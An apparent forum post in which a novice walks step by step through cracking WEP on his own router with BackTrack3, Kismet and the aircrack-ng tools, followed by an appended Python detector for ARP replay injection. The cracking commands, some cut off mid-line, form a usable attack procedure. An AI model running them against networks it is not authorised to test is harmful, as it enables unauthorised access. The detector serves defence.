This is using a stock Asus EEE PC 8G with stock drivers.
I installed Backtrack3 on a 1gig USB drive and booted up with it.
My Asus is my first Linux experience and all of the information I used is from this page: "http://ryanunderdown.com/2007/02/12/cracking-wep-using-backtrack/"
I had to modify some of my commands for whatever reason, but it wasn't too hard after some Googling to get more effective commands.
I have no specific knowledge of Linux operating systems or hacking networks. I set up a network with a DLink Router using 128-bit WEP encryption.
I hacked my OWN network, not anyone else's.
I did notice that until I made one of my computers re-connect to the secure network, I was not picking up any ARP (IVs) packets that I needed in order to decrypt.
One problem I had (have) is that after I successfully cracked the password, I couldn't figure out how to get my wireless device out of monitor mode. I simply reset the computer and input the password to make sure it worked. I thought that by quitting kismet it would come back, but it didn't. Stopping and restarting it also didn't work.
The website listed above is a great, simple run-down of how to do this, and below are the specific commands I used to accomplish the crack.
Open Kismet
Select ath0
Press "s" to arrange networks
Press "P" to arrange by # packets
Press "L" to lock the channel on selected channel
Press "enter" on network to get name (SSID) and MAC (BSSID) and Channel (1-11)
Press "c" to make sure you have clients on the network in question
Use airodump to capture IV packets (the ones with password info)
type "airodump-ng --ivs -w /root/Desktop/ --channel
This will put two files on your desktop (-01.ivs & -01.txt); these files are capturing the ivs packets you need to decrypt the network password
Associate wireless card with aireplay for packet injecting
type "aireplay-ng -1 0 -e
-1 = type of attack = fake AP authentication
0 = delay in attack
-e = SSID (name) of Access Point
-a = (Access Point MAC)
-h = WIFI CARD MAC
ath0 = wireless interface ID
Start Packet Injection
type "aireplay-ng -3 -b
When you have about 250-500k IV packets (not total packets) you can move on.
Using aircrack
type "aircrack-ng -s /root/Desktop/-01.ivs"
This will bring up a network list to crack - pick the one you want
This will analyze the packets and look for the passwords in the ivs files
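
From the defending side, the injection step is the loud part of this procedure: an ARP request replay retransmits one captured encrypted frame over and over, so a single transmitter repeats the same IV and frame length at a high rate. The following is an added example, not part of the original post, that flags that pattern in frame records; the record layout, thresholds, MAC addresses and sample data are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 5.0    # assumed sliding window, in seconds
THRESHOLD = 100   # assumed: identical frames per window before alerting

def detect_replay(frames, window_s=WINDOW_S, threshold=THRESHOLD):
    """frames: (timestamp, transmitter MAC, IV hex, length) tuples sorted by time.
    Returns {mac: (iv, length, peak_count)} for transmitters that sent the
    same (IV, length) frame at least `threshold` times inside one window."""
    recent = defaultdict(deque)   # (mac, iv, length) -> timestamps in window
    alerts = {}
    for ts, mac, iv, length in frames:
        stamps = recent[(mac, iv, length)]
        stamps.append(ts)
        while stamps[0] <= ts - window_s:   # expire old sightings
            stamps.popleft()
        # Ordinary 802.11 retries also repeat an IV, but only a handful of
        # times, so they stay far below the threshold.
        if len(stamps) >= threshold and len(stamps) > alerts.get(mac, ("", 0, 0))[2]:
            alerts[mac] = (iv, length, len(stamps))
    return alerts

def sample_frames():
    """Constructed records: a normal client plus a station replaying one frame."""
    frames = []
    for i in range(300):                       # client: fresh IV per frame
        rec = (i * 0.02, "00:11:22:33:44:55", f"{i:06x}", 120 + i % 40)
        frames.append(rec)
        if i % 50 == 0:                        # occasional link-layer retries
            frames += [(rec[0] + 0.001, *rec[1:]), (rec[0] + 0.002, *rec[1:])]
    for i in range(1000):                      # replay: same IV and length
        frames.append((1.0 + i * 0.002, "66:77:88:99:aa:bb", "a1b2c3", 68))
    return sorted(frames)

if __name__ == "__main__":
    for mac, (iv, length, count) in detect_replay(sample_frames()).items():
        print(f"ALERT {mac}: IV {iv}, {length}-byte frame seen {count}x in {WINDOW_S}s")
```

The threshold has to sit well above the retry count of a healthy link; set too low, it flags ordinary clients as well.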